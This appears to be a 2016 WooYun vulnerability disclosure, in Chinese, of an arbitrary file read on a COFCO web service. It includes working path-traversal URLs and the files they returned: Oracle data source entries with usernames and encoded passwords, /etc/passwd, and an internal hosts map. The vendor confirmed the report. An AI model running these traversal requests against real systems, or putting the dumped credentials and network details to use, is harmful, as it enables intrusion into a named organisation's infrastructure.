当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170242

漏洞标题:中粮某站任意文件读取

相关厂商:中粮集团有限公司

漏洞作者: 陆由乙

提交时间:2016-01-15 20:20

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:文件包含

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-15: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

。。。。

详细说明:

数据库内网了。

漏洞证明:

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

<dataSource>
<dataSourceName>zldmzs</dataSourceName>
<oidMark>G6</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zldmzs</user>
<password>ejpkngehdmgdadjlkoabcofffpakfjad</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>180</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlzg</dataSourceName>
<oidMark>A9</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlzg</user>
<password>plofddiokiicfkbf</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>50</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>nc501</dataSourceName>
<oidMark>V5</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>nc501</user>
<password>omoealbjmmmloakmlhpochcfpailcbjg</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>140</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlzc</dataSourceName>
<oidMark>F8</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlzc</user>
<password>hbloeifaeacenmgo</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>60</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlcyy</dataSourceName>
<oidMark>R1</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlcyy</user>
<password>elappllbodoijkpjlhpochcfpailcbjg</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>50</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlcx</dataSourceName>
<oidMark>H9</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlcx</user>
<password>gdobfeomngdhihma</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>50</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlmy</dataSourceName>
<oidMark>T3</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlmy</user>
<password>bclmbmgoogiikhof</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>60</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlsl</dataSourceName>
<oidMark>R8</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlsl</user>
<password>eoehlbbimppgpnpe</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>100</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>iufo</dataSourceName>
<oidMark>F2</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>iufo501</user>
<password>mecfkbgahfgmnhnemhclcbijjcckllal</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>150</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlxm</dataSourceName>
<oidMark>X6</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlxm</user>
<password>gakifebhkonchihj</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>40</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>
<dataSource>
<dataSourceName>zlyz</dataSourceName>
<oidMark>H1</oidMark>
<databaseUrl>jdbc:oracle:thin:@(DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.102)(PORT=1521))(ADDRESS = (PROTOCOL = TCP)(HOST =192.168.1.103)(PORT = 1521))(LOAD_BALANCE = no)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = ora10g)))</databaseUrl>
<user>zlyz</user>
<password>jlgoafmdelbingpl</password>
<driverClassName>oracle.jdbc.OracleDriver</driverClassName>
<databaseType>ORACLE10G</databaseType>
<maxCon>90</maxCon>
<minCon>10</minCon>
<dataSourceClassName>nc.bs.mw.ejb.xares.IerpDataSource</dataSourceClassName>
<xaDataSourceClassName>nc.bs.mw.ejb.xares.IerpXADataSource</xaDataSourceClassName>
<conIncrement>0</conIncrement>
<conInUse>0</conInUse>
<conIdle>0</conIdle>
</dataSource>


passwd
http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh


hosts

10.6.2.109      NCAPP2
10.6.2.107 NCAPP1
192.168.1.107 NCAPP1
192.168.1.11 p55a
192.168.1.103 p55avip
11.10.10.1 p55apriv
192.168.1.12 p55b
192.168.1.102 p55bvip
11.10.10.2 p55bpriv
152.5.94.88 mail.cofco.com

修复方案:

升级

版权声明:转载请注明来源 陆由乙@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-01-18 12:48

厂商回复:

非常感谢,马上处理!

最新状态:

暂无